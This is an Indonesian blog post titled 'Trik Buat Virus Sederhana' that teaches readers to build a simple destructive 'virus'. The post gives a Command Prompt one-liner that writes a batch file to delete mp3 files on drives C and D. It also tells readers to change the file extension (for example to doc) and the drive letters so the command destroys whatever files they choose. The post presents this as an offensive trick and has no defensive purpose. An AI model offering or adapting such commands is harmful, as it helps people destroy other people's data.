Trik Buat Virus Sederhana

|
 

virus komputerSaya tahu pasti yang baca artikel ini ingin mencoba membuat virus kan ? Open-mouthed smile 
Nah disini aku datang untuk berbagi sedikit cara membbuat virus hanya untuk anda semua yang sudah berkunjung di blog ini.. saya hanya memberikan trik membuat virus ini hanya pada tahap sederhana karena kalau sudah besar aku takut disalahgunakan nantinya.
ok sekarang langsung saja aku kasih tahu bagaimana caranya :

  1. Buka Command Prompt
  2. Langsung aja kamu ketik perintah ini echo for %%p in (c d) do del *. mp3 %p:> eagus.bat
  3. Kalau sudah tekan saja Enter kemudian Lihat apa yang terjadi pada file mp3 di Harddisk C dan D

    Nah dari perintah diatas anda bisa memodifikasi file-file apa yang akan anda rusak, kalau dari contoh perintah diatas hanya file mp3 yang dirusak. . Kalau mau file word yang dirusak ganti aja dengan extensi file doc. begitu juga dengan partisinya yg ad didalam kurung itu (c d) bisa anda ganti sesuai nama partisi di komputer anda apakah itu a, b, c, d, dst…
    Itu saja yang bisa saya berikan.

0 komentar:

Posting Komentar

Next Prev
▲Top▲